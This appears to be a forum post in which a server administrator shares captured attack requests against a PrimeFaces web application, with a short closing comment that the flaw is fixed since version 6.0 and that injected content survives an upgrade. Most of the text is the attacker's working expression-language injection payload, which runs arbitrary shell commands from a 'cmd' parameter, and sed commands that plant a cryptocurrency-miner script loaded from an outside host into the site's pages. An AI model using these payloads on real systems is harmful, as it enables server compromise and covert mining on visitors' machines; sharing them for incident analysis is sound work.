Request 1:
Code: Select all
${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD 1:
Request2:
Code: Select all
${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD 2:
Code: Select all
&cmd=cd ..;find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*jhondi33.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*smkimmo.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*cryptoloot.*<\/script>||g' -e 's|<script.*var miner = new CRLT\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</ui:define>|<scr''ipt src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></s''cript><scr''ipt>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scri''pt></ui:define>|g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</h:body>|<sc''ript src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></scri''pt><sc''ript>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scr''ipt></h:body>|g' 2>&1
Request3:
Code: Select all
${session.setAttribute("arr","".getClass().forName("java.util.ArrayList").newInstance())}
${session.setAttribute("scriptfactory", session.getClass().getClassLoader().getParent().newInstance(session.getAttribute("arr").toArray(session.getClass().getClassLoader().getParent().getURLs())).loadClass("javax.script.ScriptEngineManager").newInstance())}
${session.setAttribute("scriptengine",session.getAttribute("scriptfactory").getEngineByName("JavaScript"))}
${facesContext.getExternalContext().setResponseHeader("resp1", session.getAttribute("scriptengine"))}
${session.getAttribute("scriptengine").getContext().setWriter(facesContext.getExternalContext().getResponse().getWriter())}
${session.getAttribute("scriptengine").eval("var proc = new java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"/bin/sh\",\"-c\",\"".concat(request.getParameter("cmd")).concat("\"]).start(); var is = proc.getInputStream(); var sc = new java.util.Scanner(is,\"UTF-8\"); var out = \"\"; while (sc.hasNext()) {out += sc.nextLine()+String.fromCharCode(10);} print(out);"))}
${facesContext.getExternalContext().getResponse().getWriter().flush()}${facesContext.getExternalContext().getResponse().getWriter().close()}
${facesContext.getExternalContext().setResponseHeader("stillok", "yes")}
CMD3:
Code: Select all
cmd=cd /lib;find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*jhondi33.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*smkimmo.*<\/script>||g' -e 's|<script.*var miner = new deepMiner\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i -e 's|<script.*cryptoloot.*<\/script>||g' -e 's|<script.*var miner = new CRLT\.Anonymous.*<\/script>||g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</ui:define>|<scr''ipt src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></s''cript><scr''ipt>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scri''pt></ui:define>|g' 2>&1; find . -type f -name '*.xhtml' | xargs sed -i 's|</h:body>|<sc''ript src=\"https://jhondi33.duckdns.org:7777/deepMiner.js\"></scri''pt><sc''ript>var miner = new deepMiner.Anonymous(\"605dee2nnpasaa\");miner.start();</scr''ipt></h:body>|g' 2>&1
As you can see, it runs something from the CMD url parameter. Will extract those commands now.
As i said, it's fixed since 6.0 but as something with ProcessBuilder is executed, it seems that a restart of the server with a new PF version doesn't remove those stuff.